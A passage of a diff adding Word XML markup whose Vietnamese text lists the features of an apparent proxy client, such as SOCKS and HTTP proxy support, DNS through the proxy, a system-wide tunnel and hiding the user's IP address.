+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cổng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> proxy.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Vượt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>giới</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>tường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>lửa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cổng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bị</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>giới</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>ba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>loại</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> proxy: SOCKS v4, SOCKS v5, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTTP.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Xử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>lý</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>tên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> DNS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> proxy.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>+ "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Đường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hầm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>toàn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bộ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hệ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thống</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>buộc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>tất</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cả</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>trong</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hệ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thống</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>làm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>việc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> proxy).</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Đảm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bảo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>sự</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>riêng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>tư</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bằng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cách</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>ẩn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>địa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chỉ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
